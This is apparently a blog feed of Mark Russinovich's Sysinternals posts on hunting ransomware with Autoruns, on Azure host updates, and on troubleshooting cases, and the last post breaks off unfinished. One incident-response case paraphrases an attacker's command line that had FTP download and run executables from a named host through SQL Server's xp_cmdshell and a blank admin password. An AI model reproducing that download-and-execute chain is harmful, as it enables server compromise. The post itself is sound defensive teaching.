Mark's Bloghttps://blogs.technet.microsoft.com/markrussinovich
Mark Russinovich's technical blog covering topics such as Windows troubleshooting, technologies and security.Sat, 18 Apr 2015 04:38:48 +0000en-UShourly1Hunting Down and Killing Ransomwarehttps://blogs.technet.microsoft.com/markrussinovich/2013/01/02/hunting-down-and-killing-ransomware/
https://blogs.technet.microsoft.com/markrussinovich/2013/01/02/hunting-down-and-killing-ransomware/#commentsMon, 07 Jan 2013 08:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2013/01/07/hunting-down-and-killing-ransomware/Scareware, a type of malware that mimics antimalware software, has been around for a decade and shows no sign of going away. The goal of scareware is to fool a user into thinking that their computer is heavily infected with malware and the most convenient way to clean the system is to pay for the full version of the scareware software that graciously brought the infection to their attention. I wrote about it back in 2006 in my The Antispyware Conspiracy blog post, and the fake antimalware of today doesn’t look much different than it did back then, often delivered as kits that franchisees can skin with their own logos and themes. There’s even one labeled Sysinternals Antivirus:

A change that’s been occurring in the scareware industry over the last few years is that most scareware today also classifies as ransomware. The examples in my 2006 blog post merely nagged you that your system was infected, but otherwise let you continue to use the computer. Today’s scareware prevents you from running security and diagnostic software at the minimum, and often prevents you from executing any software at all. Without advanced malware cleaning skills, a system infected with ransomware is usable only to give in to the blackmailer’s demands to pay.

In this blog post I describe how different variants of ransomware lock the user out of their computer, how they persist across reboots, and how you can use Sysinternals Autoruns to hunt down and kill most current ransomware variants from an infected system.

The Prey

Before you can hunt effectively, you must first understand your prey. Fake-antimalware-type scareware, by far the most common type of ransomware, usually aims at being constantly annoying rather than completely locking a user out of their system. The prevalent strains use built-in lists of executables to determine what that they will block, which usually includes most antimalware and even the primary Sysinternals tools. They customarily let the user run most built-in software like Paint, but sometimes will block some of those. When they block an executable they display a dialog falsely claiming that it was blocked because of an infection:

But malware has gotten even more aggressive in the last couple of years, not even pretending to be anything other than the ransomware that they are. Take this example, which completely takes over a computer, blocking all access to anything except its own window, and demands an unlock code to regain the use of the system that the user must purchase by calling the number specified (in this case one with a Russian country code) :

Here’s one that similarly takes over the computer, but forces the user to do some online shopping to redeem the computer’s use (I haven’t investigated to see what amount of purchasing returns the use of the computer):

And here’s one that I suppose can also be called scareware, because it informs the user that their system harbors child pornography, something that would be horrifying news to most people. The distributor must believe that the fear of having to defend against charges of child pornography will dissuade victims from going to the authorities and convince them to instead pay the requested fee.

Some ransomware goes so far as to present itself as official government software. Here’s one supposedly from the French police that informs users that pirated movies reside on their computer and they must pay a fine as punishment:

As far as how these malefactors lock users out of their computer, there are many different techniques in practice. One commonly used by the fake-antimalware variety, like the Security Shield malware shown in an earlier screenshot, is to block the execution of other programs by simply watching for the appearance of new windows and forcibly terminating the owning process. Another technique, used by the online shopping ransomware example pictured above, is to hide any windows not belonging to the malware, thus technically enabling you to launch other software but not to interact with it. A similar approach is for malware to create a full-screen window and to constantly raise the window to the top of the window order, obscuring all other application windows behind it. I’ve also seen more devious tricks, like one sample that creates a new desktop and switches to it, similar to the way Sysinternals Desktops works – but while your programs are still running, you can’t switch to their desktop to interact with them.

Finding a Position from Which to Hunt

The first step for cleaning a system of the tenacious grip of ransomware is to find a place from which to perform the cleaning. All of the lock-out techniques make it impossible to interact with a system from the infected account, which is typically its primary administrative account. If the victim system has another administrative account and the malware hasn’t hijacked a global autostart location that infects all accounts, then you’ve gotten lucky and can clean from there.

Unfortunately, most systems only have one administrative account, removing the alternate account option. The fallback is to try Safe Mode, which you can reach by typing F8 during the boot process (reaching Safe Mode is a little more difficult in Windows 8). Most ransomware configures itself to automatically start by creating an entry in the Run or RunOnce key of HKCU\Software\Microsoft\Windows\CurrentVersion (or the HKLM variants), which Safe Mode doesn’t process, so Safe Mode can provide an effective platform from which to clean such malware. A growing number of ransomware samples modify HKCU\Software\Microsoft\Window NT\CurrentVersion\Winlogon\Shell (or the HKLM location), however, which both Safe Mode and Safe with Networking execute. Safe Mode with Command Prompt overrides the registry shell selection, so it circumvents the startup of the majority of today’s ransomware and is the next fallback position:

Finally, if the malware is active even in Safe Mode with Command Prompt, you’ll have no choice but to go offline hunting in an alternate Windows installation. There are a number of options available. If you have Windows 8, creating a Windows 8 To Go installation is ideal, since it is literally a full version of Windows. An alternative is to boot the Windows Setup media and type Shift+F10 to open a command-prompt when you reach the first graphical screen:

You won’t have access to Internet Explorer and many applications won’t work properly in Windows Setup’s stripped-down environment, but you can run many of the Sysinternals tools. Finally, you can create a Windows Preinstallation Environment (WinPE) boot media, which is an environment similar to that of Windows Setup and something that Microsoft Diagnostic and Repair Tooltkit (MSDaRT) uses.

The Hunt

Now that you’ve found your hunting spot, it’s time to select your weapon. The easiest to use is of course off-the-shelf antimalware software. If you’re logged in to an alternate account or Safe Mode you can use standard online-scanning products, many of which are free, like Microsoft’s own Windows Defender. If you’re booted into a different Windows installation, however, then you’ll need to use an offline scanner, like Windows Defender Offline. If the antimalware engine isn’t able to detect or clean the infection, you’ll have to turn to more a more precise and manual weapon.

One utility that enables you to rip the malware’s tendrils off the system is Sysinternals Autoruns. Autoruns is aware of over a hundred places where malware can configure itself to automatically start when Windows boots, a user logs in, or a specific built-in application launches. The way you need to run it depends on what environment you’re hunting from, but in all cases you should run it with administrative rights. Also, Autoruns automatically starts scanning when you start it; you should abort the initial scan by pressing the Esc key, then open the Filter dialog and select the options to verify signatures and to hide all Microsoft entries so that malware will appear more prominently, and restart the scan:

If you’re logged into a different account from the one that’s infected, then you need to point Autoruns at the infected account by selecting it from the User menu. In this example Autoruns is running in the Fred account, but the one that’s infected is Abby, so I’ve selected the Abby profile:

If you’ve booted into a different operating system then you need to use Autoruns offline support, which requires you to specify the root of the target Windows installation and the target user profile. Open the Analyze Offline System dialog from the File menu and enter the appropriate directories:

Of course, since Autoruns just shows autostart configuration and not running processes, some of these attributes are not relevant. Nevertheless, I’ve found in my examination of several dozen variants of current ransomware that all of them of them satisfy more than one, most commonly by not having a description or company name and having a random or suspicious file name.

One downside to offline scanning is that signature verification doesn’t work properly. This is because Windows uses catalog signing, as opposed to direct image signing, where it stores signatures in separate files rather than in the images themselves. Autoruns doesn’t process offline catalog files (I’ll probably add that support in the near future), so all catalog-signed images will show up as unverified and highlighted in red. Since most malware doesn’t pretend to be from Microsoft, you can try an initial scan with the option to verify code signatures unchecked. Here’s the result of an offline scan with signature verification disabled of a ransomware infection that takes over two autostart locations – see if you can spot them:

If you are unsure about an image, you can try uploading it to Virustotal.com for analysis by around 40 of the most popular antivirus engines, searching the Web for information, and looking at the strings embedded in the file using the Sysinternals Strings utility.

The Kill

Once you’ve determined which entries belong to malware, the next step is to disable them by deselecting the checkboxes of their autostart entries. This will allow you to re-enable the entries later if you discover you made a mistake. It doesn’t hurt to also move the malware files and any other suspicious files in the directory of the ones configured to autostart to another directory. Moving all the files makes it more likely that you’ll break the malware even if you miss an autostart location.

Next, check to see if your prey is dead by booting the system and logging into the account that was infected. If you still see signs of an infection, you might have missed something in your Autoruns analysis, so repeat the steps. If that doesn’t yield success, the malware may be a more sophisticated strain, for example one that infects the Master Boot Record or that infects the system in some other unconventional way to persist across reboots. There is also ransomware that goes further and encrypts files, but they are relatively rare. Fortunately, ransomware authors are lazy and generally don’t need to go to such extents to be effective, so a quick analysis with Autoruns is virtually always lethal.

Happy hunting!

If you liked this post, you’ll like my two highly-acclaimed cyberthriller novels, Zero Day and Trojan Horse. Watch their exciting video trailers, read sample chapters and find ordering information on my personal site at http://russinovich.com

]]>https://blogs.technet.microsoft.com/markrussinovich/2013/01/02/hunting-down-and-killing-ransomware/feed/9The Case of the Unexplained FTP Connectionshttps://blogs.technet.microsoft.com/markrussinovich/2012/10/28/the-case-of-the-unexplained-ftp-connections/
https://blogs.technet.microsoft.com/markrussinovich/2012/10/28/the-case-of-the-unexplained-ftp-connections/#commentsTue, 30 Oct 2012 07:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2012/10/30/the-case-of-the-unexplained-ftp-connections/A key part of any cybersecurity plan is “continuous monitoring”, or enabling auditing and monitoring throughout a network environment and configuring automated analysis of the resulting logs to identify anomalous behaviors that merit investigation. This is part of the new “assumed breach” mentality that recognizes no system is 100% secure. Unfortunately, the company at the heart of this case didn’t have a comprehensive monitoring system, so had been breached for some time before updated antimalware signatures cleaned their infection and brought the breach to their attention. Besides highlighting just how weak cybersecurity is at many companies, this case highlights the use of several Sysinternals Process Monitor features, including the Process Tree dialog and one feature many people aren’t aware of, Process Monitor’s ability to monitor network activity.

The case opened when a network administrator at a South African company contacted Microsoft Services Premier Support and reported that their corporate Exchange server, running on Windows Server 2008 R2, appeared to be making outbound FTP connections. They noticed this only because the company’s installation of Microsoft Forefront Endpoint Protection (FEP) alerted them that it had cleaned a piece of malware it found on the server. Concerned that their network might still be compromised despite the fact that FEP claimed the system was malware-free, he examined the company’s perimeter firewall logs. To his horror, he discovered FTP connections that numbered in the hundreds per day and dated back several weeks. Instead of attempting a forensic examination on his own, he called on Microsoft’s security consulting team, which specializes in helping customers clean up after an attack.

The Microsoft support engineer assigned the case began by capturing a five-minute Process Monitor trace of the Exchange server. After stopping the trace he opened the Process Tree dialog (under the Tools menu), which shows the parent-child relationships of all the processes that existed at any point in the current trace. He quickly found that around 20 FTP processes had been launched during the collection, each of them short-lived, except for one, which was still active (process 7324 below):

The engineer looked at the command lines for the FTP processes by selecting them in the tree so that their details appeared at the bottom of the Process Tree dialog. The command lines for the half of them bizarrely included just the “-?” argument, which simply brings up FTP help:

The other half were more interesting, including “-i” and “-s” switches:

The –i switch has FTP turn off prompting for multiple file transfers, and –s directs FTP to execute the FTP commands listed in a file, in this case a file named “j”. Setting out to find out what file ‘”j” contained, he clicked on the “Include Process” button at the bottom of the Process Tree dialog so that he could find the process’s file events:

He searched the resulting filtered trace for “j” and found the file’s location in several of the events:

He navigated to the C:\Windows\System32\i4333 directory, but the “j” file was gone. That being a dead end, he turned his attention to the FTP process’s parent, Cmd.exe, and looked at its command line. The line was too long and convoluted to easily understand:

He selected it, typed Ctrl+C to copy it to the clipboard, pasted it into Notepad, and decomposed it into its constituent components, each of which was separated by a “&”. The result looked like this:

The first instruction has the command prompt create a directory named i4333 and then start creating the contents of the “j” file. The commands it writes into “j” instruct FTP to connect to NUXZb.in.into4.info, login with the user name “New” and the password “123”, then download all the files on the FTP server that end with “.exe”. After FTP has processed the file, the command prompt deletes “j” and then creates a batch file that executes the downloaded files, first using the Shell to launch them (“start”) and then the Command Prompt.

A quick detour to Whois showed the engineer that the NUXZb hostname was issued by Protected Name Services and didn’t reveal any useful information. The engineer toggled off Process Monitor’s network name resolution and found the outbound FTP connection in the trace to see the IP address the name had resolved to:

An IP address location lookup on the Web pinpointed the IP address at an ISP in Chicago (the name now resolves to a different IP address), so he concluded the connection was to a server that was also compromised or one the attacker had hosted at the ISP. Finished analyzing the command line, he looked at the contents of the resulting script, D.bat, which was still in the directory and contained this single command:

Not coincidentally, 134.exe was the executable Forefront had flagged as a remote access Trojan (RAT) in the alerts that the administrator first responded to. The script could therefore not find it, making it seem that the attack – or at least this part of it – had been neutralized by FEP. It also implied that the attack was automated and stuck in a loop trying to activate.

The engineer next set out to determine how the command-prompt processes were being launched. Looking at their parent processes in the process tree, he learned they were all launched from Sqlserver.exe:

This obviously wasn’t a good sign, but it wasn’t the worst of it: examining SQL Server’s network activity in the trace, he saw many incoming connections:

Lookups of the IP address locations placed them in China, Tunisia, Taiwan, and Morocco:

The SQL Server was being used by an attacker or multiple attackers from around the world in countries known for being cybercriminal safe havens. It was clearly time to flatten the server, but before calling the administrator to give him the bad news and advise him to immediately disconnect the server from the network, he thought he’d spend a few minutes examining the security of the SQL Server. Understanding what had led to the compromise could help the company avoid being compromised the same way again.

He launched a Microsoft support batch file that checks various SQL Server security settings. The tool ran for a few seconds and then printed its discouraging results: the server had an administrator account with a blank password, was configured for mixed-mode authentication, and allowed stored procedures to launch command prompts via the enablement of the “xp_cmdshell” feature:

That meant that anyone on the Internet could logon to the server without a password and execute executables – like FTP – to infect the system with their own tools.

With the help of Process Monitor and some discussion with the company’s administrator, the support engineer had a solid theory for what had happened: an administrator at the company had installed SQL Server on the company’s Exchange server several weeks prior to the incident. Not realizing the server was on the perimeter, they had opened the SQL Server’s port in the local firewall, left it with a blank admin account, and enabled xp_cmdshell. It goes without saying that even if the server wasn’t on the Internet, that configuration leaves a server without any network security. Not long after, automated malware scanning the Internet for exposed targets had stumbled across the open SQL port, infected the server with malware, and likely enlisted it in a Botnet. FEP signatures for the new malware variant were delivered to the server some time later and removed the infection. The Botnet-enlisting malware was still trying to reintegrate the server when the case with Microsoft support was opened. While the company can’t know how much – if any – of its corporate data was pilfered during the infection, this was a very loud and clear wakeup call.

Windows Azure’s compute platform, which includes Web Roles, Worker Roles, and Virtual Machines, is based on machine virtualization. It’s the deep access to the underlying operating system that makes Windows Azure’s Platform-as-a-Service (PaaS) uniquely compatible with many existing software components, runtimes and languages, and of course, without that deep access – including the ability to bring your own operating system images – Windows Azure’s Virtual Machines couldn’t be classified as Infrastructure-as-a-Service (IaaS).

The Host OS and Host Agent

Machine virtualization of course means that your code – whether it’s deployed in a PaaS Worker Role or an IaaS Virtual Machine – executes in a Windows Server hyper-v virtual machine. Every Windows Azure server (also called a Physical Node or Host) hosts one or more virtual machines, called “instances”, scheduling them on physical CPU cores, assigning them dedicated RAM, and granting and controlling access to local disk and network I/O.

The diagram below shows a simplified view of a server’s software architecture. The host partition (also called the root partition) runs the Server Core profile of Windows Server as the host OS and you can see the only difference between the diagram and a standard Hyper-V architecture diagram is the presence of the Windows Azure Fabric Controller (FC) host agent (HA) in the host partition and the Guest Agents (GA) in the guest partitions. The FC is the brain of the Windows Azure compute platform and the HA is its proxy, integrating servers into the platform so that the FC can deploy, monitor and manage the virtual machines that define Windows Azure Cloud Services. Only PaaS roles have GAs, which are the FC’s proxy for providing runtime support for and monitoring the health of the roles.

Reasons for Host Updates

Ensuring that Windows Azure provides a reliable, efficient and secure platform for applications requires patching the host OS and HA with security, reliability and performance updates. As you would guess based on how often your own installations of Windows get rebooted by Windows Update, we deploy updates to the host OS approximately once per month. The HA consists of multiple subcomponents, such as the Network Agent (NA) that manages virtual machine VLANs and the Virtual Machine virtual disk driver that connects Virtual Machine disks to the blobs containing their data in Windows Azure Storage. We therefore update the HA and its subcomponents at different intervals, depending on when a fix or new functionality is ready.

The steps we can take to deploy an update depend on the type of update. For example, almost all HA-related updates apply without rebooting the server. Windows OS updates, though, almost always have at least one patch, and usually several, that necessitate a reboot. We therefore have the FC “stage” a new version of the OS, which we deploy as a VHD, on each server and then the FC instructs the HAs to reboot their servers into the new image.

PaaS Update Orchestration

A key attribute of Windows Azure is its PaaS scale-out compute model. When you use one of the stateless virtual machine types in your Cloud Service, whether Web or Worker, you can easily scale-up and scale-down the role just by updating the instance count of the role in your Cloud Service’s configuration. The FC does all the work automatically to create new virtual machines when you scale out and to shut down virtual machines and remove when you scale down.

What makes Windows Azure’s scale-out model unique, though, is the fact that it makes high-availability a core part of the model. The FC defines a concept called Update Domains (UDs) that it uses to ensure a role is available throughout planned updates that cause instances to restart, whether they are updates to the role applied by the owner of the Cloud Service, like a role code update, or updates to the host that involve a server reboot, like a host OS update. The FC’s guarantee is that no planned update will cause instances from different UDs to be offline at the same time. A role has five UDs by default, though a Cloud Service can request up to 20 UDs in its service definition file. The figure below shows how the FC spreads the instances of a Cloud Service’s two roles across three UDs.

Role instances can call runtime APIs to determine their UD and the portal also shows the mapping of role instances to UDs. Here’s a cloud service with two roles having two instances each, so each UD has one instance from each role:

The behavior of the FC with respect to UDs differs for Cloud Service updates and host updates. When the update is one applied by a Cloud Service, the FC updates all the instances of each UD in turn. It moves to a subsequent UD only when all the instances of the previous have restarted and reported themselves healthy to the GA, or when the Cloud Service owner asks the FC via a service management API to move to the next UD.

Instead of proceeding one UD at a time, the order and number of instances of a role that get rebooted concurrently during host updates can vary. That’s because the placement of instances on servers can prevent the FC from rebooting the servers on which all instances of a UD are hosted at the same time, or even in UD-order. Consider the allocation of instances to servers depicted in the diagram below. Instance 1 of Service A’s role is on server 1 and instance 2 is on server 2, whereas Service B’s instances are placed oppositely. No matter what order the FC reboots the servers, one service will have its instances restarted in an order that’s reverse of their UDs. The allocation shown is relatively rare since the FC allocation algorithm optimizes by attempting to place instances from the same UD – regardless of what service they belong to – on the same server, but it’s a valid allocation because the FC can reboot the servers without violating the promise that it not cause instances of different UDs of the same role (of the a single service) to be offline at the same time.

Another difference between host updates and Cloud Service updates is that when the update is to the host, however, the FC must ensure that one instance doesn’t indefinitely stall the forward progress of server updates across the datacenter. The FC therefore allots instances at most five minutes to shut down before proceeding with a reboot of the server into a new host OS and at most fifteen minutes for a role instance to report that it’s healthy from when it restarts. It takes a few minutes to reboot the host, then restart VMs, GAs and finally the role instance code, so an instance is typically offline anywhere between fifteen and thirty minutes depending on how long it and any other instances sharing the server take to shut down, as well as how long it takes to restart. More details on the expected state changes for Web and Worker roles during a host OS update can be found here. Note that for PaaS services the FC manages the OS servicing for guests as well, so a host OS update is typically followed by a corresponding guest OS update (for PaaS services that have opted into updates), which is orchestrated by UD like other cloud service updates.

IaaS and Host Updates

The preceding discussion has been in the context of PaaS roles, which automatically get the benefits of UDs as they scale out. Virtual Machines, on the other hand, are essentially single-instance roles that have no scale-out capability. An important goal of the IaaS feature release was to enable Virtual Machines to be able to also achieve high availability in the face of host updates and hardware failures and the Availability Sets feature does just that. You can add Virtual Machines to Availability Sets using PowerShell commands or the Windows Azure management portal. Here’s an example cloud service with virtual machines assigned to an availability set:

Just like roles, Availability Sets have five UDs by default and support up to twenty. The FC spreads instances assigned to an Availability Set across UDs, as shown in the figure below. This allows customers to deploy Virtual Machines designed for high availability, for example two Virtual Machines configured for SQL Server mirroring, to an Availability Set, which ensures that a host update will cause a reboot of only one half of the mirror at a time as described here (I don’t discuss it here, but the FC also uses a feature called Fault Domains to automatically spread instances of roles and Availability Sets across servers so that any single hardware failure in the datacenter will affect at most half the instances).

More Information

You can find more information about Update Domains, Fault Domains and Availability Sets in my Windows Azure conference sessions, recordings of which you can find on my Mark’s Webcasts page here. Windows Azure MSDN documentation describes host OS updates here and the service definition schema for Update Domains here.

]]>https://blogs.technet.microsoft.com/markrussinovich/2012/08/22/windows-azure-host-updates-why-when-and-how/feed/3The Case of the Veeerrry Slow Logonshttps://blogs.technet.microsoft.com/markrussinovich/2012/07/01/the-case-of-the-veeerrry-slow-logons/
https://blogs.technet.microsoft.com/markrussinovich/2012/07/01/the-case-of-the-veeerrry-slow-logons/#commentsMon, 02 Jul 2012 05:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2012/07/02/the-case-of-the-veeerrry-slow-logons/This case is my favorite kind of case, one where I use my own tools to solve a problem affecting me personally. The problem at the root of it is also one you might run into, especially if you travel, and demonstrates the use of some Process Monitor features that many people aren’t aware of, making it an ideal troubleshooting example to document and share.

The story unfolds the week before last when I made a trip to Orlando to speak at Microsoft’s TechEd North America conference. While I was there I began to experience five minute black-screen delays when I logged on to my laptop’s Windows 7 installation:

I’d typically chalk up an isolated delay like this to networking issues, common at conferences and with hotel WiFi, but I hit the issue consistently switching between the laptop’s Windows 8 installation, where I was doing testing and presentations, and the Windows 7 installation, where I have my development tools. Being locked out of your computer for that long is annoying to say the least.

The first time I ran into the black screen I forcibly rebooted the system after a couple of minutes because I thought it had hung, but when the delay happened a second time I was forced to wait it out and face the disappointing reality that my system was sick. When I logged off and back on again without a reboot in between, though, I didn’t hit the delay. It only occurred when logging on after a reboot, which I was doing as I switched between Windows 7 and Windows 8. What made the situation especially frustrating was that whenever I rebooted I was always in a hurry to get ready for my next presentation, so had to suffer with the inconvenience for several days before I finally had the opportunity to investigate.

Once I had a few spare moments, I launched Sysinternals Autoruns, an advanced auto-start management utility, to disable any auto-starting images that were located on network shares. I knew from previous executions of Autoruns on the laptop that Microsoft IT configures several scheduled tasks to execute batch files that reside on corporate network shares, so suspected that timeouts trying to launch them were to blame:

I logged off and logged back on with fingers crossed, but the delay was still there. Next, I tried logging into a local account to see if this was a machine-wide problem or one affecting just my profile. No delay. That was a positive sign since it meant that whatever the issue was, it would probably be relatively easy to fix once identified.

My goal now was to determine what was holding up the switch to the desktop. I had to somehow get visibility into what was going on during a logon immediately following a boot. The way that immediately jumped to mind as the easiest was to use Sysinternals Process Monitor to capture a trace of the boot process. Process Monitor, a tool that monitors system-wide file system, registry, process, DLL and network operations, has the ability to capture activity from very early in the boot, stopping its capture only when the system shuts down or you run the Process Monitor user interface. I selected the boot logging entry from the Options and opened the boot logging dialog:

The dialog lets you direct Process Monitor to collect profiling events while it’s monitoring the boot, which are periodic samples of thread stacks. I enabled one-second profiling, hoping that even if I didn’t spot operations that explained the delay, that I could get a clue from the stacks of the threads that were active just before or during the delay.

After I rebooted, I logged on, waited for five minutes looking at a black screen, then finally got to my desktop, where I ran Process Monitor again and saved the boot log. Instead of scanning the several million events that had been captured, which would have been like looking for a needle in a haystack, I used this Process Monitor filter to look for operations that took more than one second, and hence might have caused the slow down:

Wondering if perhaps the sequence of processes starting during the logon might reveal something, I opened the Process Tree dialog from the Tools menu. The dialog shows the parent-child relationships of all the processes active during a capture, which in the case of a boot trace means all the processes that executed during the boot and logon process. Focusing my attention on Winlogon.exe, the interactive logon manager, I noticed that a process named Atbroker.exe launched around the time I entered my credentials, and then Userinit.exe executed at the time my desktop finally appeared:

The key to the solving the mystery lay in the long pause in between. I knew that Logonui.exe simply displays the logon user interface and that Atbroker.exe is just a helper for transitioning from the logon user interface to a user session, which ruled them out, at least initially. The black screen disappeared when Userinit.exe had started, so Userinit’s parent process, Winlogon.exe, was the remaining suspect. I set a filter to include just events from Winlogon.exe and added the Relative Time column to easily see when events occurred relative to the start of the boot. When I looked at the resulting items I could easily see the delay was actually about six minutes, but there was no activity in that time period to point me at a cause:

Profiling events are excluded by default, so I clicked on the profile event filter button in the toolbar to include them, hoping that they might offer some insight:

In order to minimize log file sizes, Process Monitor’s profiling only captures a thread’s stack if the thread has executed since the last time it was sampled. I therefore was expecting to have to look at the thread profile events at the start of the event, but my eye was drawn to a pattern of the same four threads sampled every second throughout the entire black-screen period:

I was fairly certain that whatever thread was holding things up had executed some function at the beginning of the interval and was dormant throughout, so was skeptical that any of these active threads were related to the issue, but it was worth spending a few seconds to look at them. I opened the event properties dialog for one of the samples by double-clicking on it and switched to its Stack page, on the off chance that the names of the functions on the stack had an answer.

When I first run Process Monitor on a system I configure it to pull symbols for Windows images from the Microsoft public symbol server using the Debugging Tools for Windows debug engine DLL, so I can see descriptive function names in the stack frames of Windows executables, rather than just file offsets:

The first thread’s stack identified the thread as a core Winlogon “state machine” thread waiting for some unknown notification, yielding no clues:

The next thread’s stack was just as unenlightening, showing the thread to be a generic worker thread:

The stack of the third thread was much more interesting. It was many frames deep, including calls into functions of the Multiple UNC Provider (MUP) and Distributed File System Client (DFSC) drivers, both related to accessing file servers:

I scrolled down to see the frames higher on the stack and the name of one of the functions, WLGeneric_ActivationAndNotifyStartShell_Execute, pretty much confirmed the thread to be the one responsible for the problem, since it implied that it was supposed to start the desktop shell:

The next frame’s function, WNetRestoreAllConnectionsW, combined with the deeper calls into file server functions, led me to conclude that Winlogon was trying to restore file server drive letter mappings before proceeding to launch my shell and give me access to the desktop. I quickly opened Explorer, recalling that I had two drives mapped to network shares hosted on computers inside the Microsoft network, one to my development system and another to the internal Sysinternals share where I publish pre-release versions of the tools. While at the conference I was not on the intranet, so Winlogon was unable to reconnect them during the logon and was eventually – after many minutes – giving up:

Confident I’d solved the mystery, I right-clicked on each share and disconnected it. I rebooted the laptop to verify my fix (workaround to be precise), and to my immense satisfaction, the logon proceeded to the desktop within a few seconds. The case was closed! As for why the delays were unusually long, I haven’t had the time – or need – to investigate further. The point of this story isn’t to highlight this particular issue, but illustrate the use of the Sysinternals tools and troubleshooting techniques to solve problems.

TechEd Europe, which took place in Amsterdam last week, gave me another chance to reprise the talks I’d given at TechEd US. I delivered the same Case of the Unexplained troubleshooting session I had at TechEd US, but this time I had the pleasure of sharing this very fresh and personal case. You can watch it and my other TechEd sessions either by going to my webcasts page, which lists all of my major sessions posted online, or follow these links directly:

]]>https://blogs.technet.microsoft.com/markrussinovich/2012/07/01/the-case-of-the-veeerrry-slow-logons/feed/20Announcing Trojan Horse, the Novel!https://blogs.technet.microsoft.com/markrussinovich/2012/05/06/announcing-trojan-horse-the-novel/
https://blogs.technet.microsoft.com/markrussinovich/2012/05/06/announcing-trojan-horse-the-novel/#commentsTue, 08 May 2012 03:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2012/05/08/announcing-trojan-horse-the-novel/Many of you have read Zero Day, my first novel. It’s a cyberthriller that features Jeff Aiken and the beautiful Daryl Haugen, computer security experts that save the world from a devastating cyberattack. Its reviews and sales exceeded my expectations, so I’m especially excited about the sequel, Trojan Horse, which I think is even more timely and exciting. Trojan Horse, like Zero Day, is an action-packed cyberthriller on a global scale, pitting Jeff and Daryl against international forces in a fight for world security and their lives. Instead of telling you more, I’ll let the Trojan Horse video trailer, below, show you instead.

Trojan Horse will be published on September 4, but you can preorder it now from your favorite online book seller (in the US only now, but Zero Day’s Korean publisher has already purchased foreign publishing rights). Find the ordering links, read more about Trojan Horse, see my other books, check out my book blog and find out where I’m speaking on my new website, markrussinovich.com. Preorder Trojan Horse now and tell your friends!

]]>https://blogs.technet.microsoft.com/markrussinovich/2012/05/06/announcing-trojan-horse-the-novel/feed/4The Case of My Mom’s Broken Microsoft Security Essentials Installationhttps://blogs.technet.microsoft.com/markrussinovich/2012/01/03/the-case-of-my-moms-broken-microsoft-security-essentials-installation/
https://blogs.technet.microsoft.com/markrussinovich/2012/01/03/the-case-of-my-moms-broken-microsoft-security-essentials-installation/#commentsWed, 04 Jan 2012 21:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2012/01/04/the-case-of-my-moms-broken-microsoft-security-essentials-installation/As a reader of this blog I suspect that you, like me, are the IT support staff for your family and friends. And I bet many of you performed system maintenance duties when you visited your family and friends during the recent holidays. Every time I’m visiting my mom, I typically spend a few minutes running Sysinternals Process Explorer and Autoruns, as well as the Control Panel’s Program Uninstall page, to clean the junk that’s somehow managed to accumulate since my last visit.

This holiday, though, I was faced with more than a regular checkup. My mom recently purchased a new PC, so as a result, I spent a frustrating hour removing the piles of crapware the OEM had loaded onto it (now I would recommend getting a Microsoft Signature PC, which are crapware-free). I say frustrating because of the time it took and because even otherwise simple applications were implemented as monstrosities with complex and lengthy uninstall procedures. Even the OEM’s warranty and help files were full-blown installations. Making matters worse, several of the craplets failed to uninstall successfully, either throwing error messages or leaving behind stray fragments that forced me to hunt them down and execute precision strikes.

As my cleaning was drawing to a close, I noticed that the antimalware the OEM had put on the PC had a 1-year license, after which she’d have to pay to continue service. With excellent free antimalware solutions on the market, there’s no reason for any consumer to pay for antimalware, so I promptly uninstalled it (which of course was a multistep process that took over 20 minutes and yielded several errors). I then headed to the Internet to download what I – not surprisingly given my affiliation – consider the best free antimalware solution, Microsoft Security Essentials (MSE). A couple of minutes later the setup program was downloaded and the installation wizard launched. After clicking through the first few pages it reported it was going to install MSE, but then immediately complained that an “error has prevented the Security Essentials setup wizard from completing successfully.”:

The suggestion to “restart your computer and try again” is intended to deal with failures caused by interference from an unfinished uninstall of existing antimalware (or a hope that whatever unexpected error condition caused the problem is transient). I’d just rebooted, so it didn’t apply. Clicking the “Get help on this issue” link provided some generic troubleshooting steps, like uninstalling other antimalware, ensuring that the Windows Installer service is configured and running (though by default it isn’t running on Windows 7 since it’s demand-start), and if all else fails, contacting customer support.

I suspected that whatever I’d run into was rare enough that customer support wouldn’t be able to help (and what would they say if they knew Mark Russinovich was calling for tech support?), especially when I found no help on the web for error code 0x80070643. My brother in law, who is also a programmer and tech support for his neighborhood was watching over my shoulder to pick up some tips, so the pressure was on to fix the problem. Out came my favorite troubleshooting tool, Sysinternals Process Monitor (remember, “when in doubt, run Process Monitor”).

I reran the MSE setup while capturing a trace with Process Monitor. Then I opened Process Monitor’s process tree view to find what processes were involved in the attempted install and identified Msiexec.exe (Windows Installer) and a few launcher processes. I also saw that Setup.exe launched Wermgr.exe, the Windows Error Reporting Manager, presumably to upload an error report to Microsoft:

I turned my attention back to the trace output and configured a filter that excluded everything but these processes of interest. Then I began the arduous job of working my way through tens of thousands of operations, hoping to find the needle in the haystack that revealed why the setup choked with error 0x80070643.

As I scanned quickly to get an overall view, I noticed some writes to log files:

However, the messages in them revealed nothing more than the cryptic error message shown in the dialog.

After a few minutes I decided I should work my way back from where in the trace operations the error occurred, so returned to the tree, selected Wermgr.exe, and clicked “Go to event”:

This would ideally be just after the setup encountered the fatal condition. Then I paged up in the trace, looking for clues. After several more minutes I noticed a pattern that accounted for almost all the operations up that point: Setup.exe was enumerating all the system’s installed applications. I determined that by observing it queried multiple installer-related registry locations, and I could see the names of the applications it found in the Details column for some of them. Here, for example, is one of the OEM’s programs, another help file-as-an-application, that I hadn’t bothered to uninstall:

I could now move quickly through the trace by scanning for application names. A minute later I stopped short, spotting something I shouldn’t have seen: “Microsoft Security Essentials”:

I knew I hadn’t seen it listed in the installed programs list in the Control Panel in my earlier uninstall-fest, which I confirmed by rechecking.

Why were there traces of MSE when it hadn’t been installed, and in fact wouldn’t install? I don’t know for sure, but after pondering this for a few minutes I came to the conclusion that the software my mother had used to transfer files and settings from her old system had copied parts of the MSE installation she had on the old PC. She likely had used whatever utility the OEM put on PC, but I would recommend using Windows Easy Transfer. But the reason didn’t really matter at this point, just getting MSE to install successfully, and I believed I had found the problem. I deleted the keys, reran the setup, and….hit the same error.

